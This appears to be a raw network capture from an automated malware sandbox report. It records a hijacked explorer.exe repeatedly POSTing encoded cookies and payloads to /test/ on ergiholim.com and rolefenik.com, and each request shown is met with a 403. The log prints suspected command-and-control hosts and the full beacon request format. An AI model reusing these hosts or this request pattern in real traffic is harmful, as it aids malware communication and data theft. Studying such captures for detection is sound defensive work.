                                                                                                                                          2024-11-13 17:22:28 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          34192.168.2.650025104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:28 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:28 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:28 UTC757INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:28 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcFAKmcPK%2FfaSbJkFjXc640Ez8Q5wgYPphAlYKHZ5uIXdo%2FtTNbsqqNBXSX3bPma%2BslqctQEWENEYZgYxaDNRGRcRu7%2B6GHcSF%2Fbr%2BYeFHUQeMIvujiItHzCgwUDbF%2FJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071b1bb5a2e2d-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1172&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=2327974&cwnd=251&unsent_bytes=0&cid=5f04bb50528df183&ts=310&x=0"
                                                                                                                                          2024-11-13 17:22:28 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          35192.168.2.650026104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:29 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:29 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:30 UTC754INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:30 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pG1ab5j64LTO5VlvQFPJ9hpdQ7ApwPNJeHya0C0Jny%2BU73gy%2BJDUpKt%2B6hC7C2wAitunGRWqVOCU3UHLyt6Kr1kcqzjsyhy6JkeXwIClmX%2Fmg4Dnm3RW56d%2Bfcz%2F2g2Z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071b9b8a9d789-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=136298&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=21590&cwnd=32&unsent_bytes=0&cid=11014f91d1b0694a&ts=501&x=0"
                                                                                                                                          2024-11-13 17:22:30 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          36192.168.2.650027104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:31 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:31 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:32 UTC746INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:32 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4CEvNqd1v0qYqo6RQznhEInlRAWxV3pk2KvGxBeHx4aN80RVWcAbvStI%2BrYqrmeiuWsBkAzo7tPhGpbkOTi0SK0P338Dzhyv9FWZ%2FnVzfFTbdtaWtSfy6g2dkEaibgx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071c33fb1685d-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=132792&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20103&cwnd=32&unsent_bytes=0&cid=47b11e534a4395f7&ts=795&x=0"
                                                                                                                                          2024-11-13 17:22:32 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          37192.168.2.650028104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:33 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:33 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:33 UTC744INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:33 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=looL4GtvGtqxvJGrm30yz67anykEXAnUj5QKUxtvWzIwSlGE4QXXlOOetn0HNJx5O3A0w2PqKIPjiWua5LVqGSLhtII5Q8flFpcBOLbQCptSMDJNNIlLw13x%2BDicwIGT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071cdaa86d74f-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=131167&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=22087&cwnd=32&unsent_bytes=0&cid=b863c50b1855407b&ts=500&x=0"
                                                                                                                                          2024-11-13 17:22:33 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          38192.168.2.650030104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:34 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:34 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:35 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:34 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7hNIQVOpAzqNsdNNHBHV%2FvFwndl2u2sxsybbCGkIYB3DP57B2a%2FUze6zFwxiBbdHxdNgf%2BzcrPpucygnzt%2FwCVTd%2FQJKp12ZSyJAIRjgsCNSzimWHxnveGuWll3zKyHu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071d67c24d77c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130451&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22215&cwnd=32&unsent_bytes=0&cid=94ba1ae2536a3aa2&ts=541&x=0"
                                                                                                                                          2024-11-13 17:22:35 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          39192.168.2.650032104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:35 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:35 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:35 UTC747INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJKkUz73wRceL473RknB4%2BPgUgX12fygoQM2NXTN00Sysh1fFnIfvhZ3y1ivctuJBd%2Bfv9WX4R1kDx2FjE9WOnbUhNrrn5xMgmn4swu5JpCRDVhhj9vL8vawGopGuXG7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071dd5a64e817-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1137&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=2375717&cwnd=251&unsent_bytes=0&cid=868425edc2d6e922&ts=281&x=0"
                                                                                                                                          2024-11-13 17:22:35 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          40192.168.2.650033104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:37 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
